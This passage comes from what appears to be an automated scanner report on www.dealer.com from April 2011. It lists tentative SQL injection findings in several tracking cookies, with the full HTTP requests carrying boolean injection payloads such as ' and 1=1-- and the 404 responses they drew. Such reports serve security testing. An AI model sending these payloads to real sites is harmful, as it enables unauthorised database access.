   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranke
...[SNIP]...

Request 2

GET /products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/loading.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1%20and%201%3d2--%20; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=1; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMA.page_visit./products/online-advertising/powermail/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002983; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts%2Finventory-marketing%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.47.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20497
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:20:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003258; expires=Mon, 16-Apr-2012 01:20:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>I really enjoy being able to go in and add a page, create the meta data for that page, and immediately have it show up. It has been tremendously helpful for us.</p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>People do ask me quite a bit, &#8216;what website provider will best help me with my search engine marketing and optimization?&#8217; I tell them the first thing they need to do is talk to Dealer.com.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The transition to Dealer.com from our previous provider was way beyond my expectations. If someone were to contact me for advice regarding which website provider would be the best, I would say Dealer.com, hands down. </p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>With Dealer.com&#8217;s new tool for managing your online reputation, you&#8217;ll be able to be on their platform and launch content out to the world and not have to login to all these different social media platforms.</p>
   <cite>Kendall Burger, Hansel Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have more visitors on our site than we do cars that go by on the street. If that's not powerful, I don't know what is. Dealer.com knows how to sell cars on the Internet. </p>
   <cite>Dave Cook, President of the Norris Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com
...[SNIP]...
1.12. http://www.dealer.com/products/lead-management/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./company/history/ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/lead-management/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./company/history/ cookie appears to be vulnerable to SQL injection attacks. The payloads 14381992%20or%201%3d1--%20 and 14381992%20or%201%3d2--%20 were each submitted in the com.silverpop.iMA.page_visit./company/history/ cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /products/lead-management/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=114381992%20or%201%3d1--%20; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002850; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A3%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.41.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20044
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:22:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003378; expires=Mon, 16-Apr-2012 01:22:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>One of the benefits of Dealer.com is when you manage a whole group, you can log into ControlCenter&#8482; and easily toggle between all stores. It&#8217;s seamless!</p>
   <cite>Kendall Burger, Hansel Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We have more visitors on our site than we do cars that go by on the street. If that's not powerful, I don't know what is. Dealer.com knows how to sell cars on the Internet. </p>
   <cite>Dave Cook, President of the Norris Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>For dealers who want to compete using SEO, they don&#8217;t need to build outside microsites for content anymore. They can do it right inside the Dealer.com platform.</p>
   <cite>Brian Pasch, Pasch Consulting Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>From technology, to innovation, to support, I've had an extremely positive experience with Dealer.com.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Dealer.com's CarFlix videos impressed me a lot because I don't have to go to more than one vendor for my video. </p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg"
...[SNIP]...

Request 2

GET /products/lead-management/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=114381992%20or%201%3d2--%20; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002850; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A3%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.41.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19987
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:23:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003379; expires=Mon, 16-Apr-2012 01:22:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>The back-end tool is one of the simplest I've seen. It's like working with a Microsoft Office program. Everything is easily spelled out for you.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>At Dealer.com, Internet Marketing is their passion. It&#8217;s what they live and breathe, so we know that they will be on the leading edge.</p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Dealer.com has lived up to every one of their promises.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>From website performance, to more visitors and more conversions, everything we were looking for improvement from has improved.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The number of visitors has doubled since we went on board nearly a year and a half ago.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Vid
...[SNIP]...
1.13. http://www.dealer.com/products/lead-management/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/lead-management/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/ cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/ cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /products/lead-management/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1'%20and%201%3d1--%20; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002850; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A3%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.41.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19968
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:17:55 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003075; expires=Mon, 16-Apr-2012 01:17:55 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Dealer.com is always looking for ways to improve, so they're intense in that. They're never standing still and their service is impeccable.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>From an Enterprise Level, Dealer.com's products have saved me hours a month in gathering my reporting and understanding what our site is doing for us. </p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We depend very heavily on the SEO team at Dealer.com to ensure that our goals are accomplished as it relates to where we show up in the search engines.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>With Dealer.com, we continuously improve and advance. We added video to our website this year and doubled the average time people spend on our site.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Our account manager is always pleasant, efficient and communicates really well with us.</p>
   <cite>Carrie Casebeer, Capitol Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO"
...[SNIP]...

Request 2

GET /products/lead-management/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1'%20and%201%3d2--%20; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002850; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A3%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.41.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20188
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:17:56 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003076; expires=Mon, 16-Apr-2012 01:17:56 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Ranked #8 in the nation in April and #12 YTD (up from 16th last year), you and your team have been leading our progress.</p>
   <cite>Ken Girard, McGrath Acura of Westmont</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>It was important that we aligned ourselves with a company that&#8217;s predicting the future.</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Throughout my first few years here, researching and developing both a website and the Internet Sales Department for this dealership, I have used several nationally known Internet Service Providers (ISP). Dealer.com ended up the clear winner for more reasons than I &#8230;</p>
   <cite>Mike Poulin, Shearer Pontiac Cadillac Hummer</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>With Dealer.com&#8217;s new tool for managing your online reputation, you&#8217;ll be able to be on their platform and launch content out to the world and not have to login to all these different social media platforms.</p>
   <cite>Kendall Burger, Hansel Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>With Dealer.com, we continuously improve and advance. We added video to our website this year and doubled the average time people spend on our site.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/websites/
...[SNIP]...
1.14. http://www.dealer.com/products/media/uploads/page/loading.gif [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/media/uploads/page/loading.gif

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /products/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003094; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fproducts%2F%22%3Bi%3A1%3Bs%3A17%3A%22%2Fcompany%2Fcontact%2F%22%3Bi%3A2%3Bs%3A30%3A%22%2Fproducts%2Finventory-marketing%2F%22%3Bi%3A3%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586%20and%201%3d1--%20; __utmb=161351586.52.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20038
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:24:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003498; expires=Mon, 16-Apr-2012 01:24:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Our account manager is always pleasant, efficient and communicates really well with us.</p>
   <cite>Carrie Casebeer, Capitol Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We've been a client of Dealer.com going on 2 years. It's been an awesome relationship right from the get-go.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We were looking for an all-in-one solution&#8212;one company with expertise in all the different fields. That is why we chose Dealer.com. </p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>I don't care who your website provider is, if it's not Dealer.com you need to at least take a look at them. I give them my absolute whole-hearted endorsement. I put my name on it. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_1.jpg" alt="Recapture lost customers & Increase Service Revenue with Service Marketing" /></a>
</li>

<li>
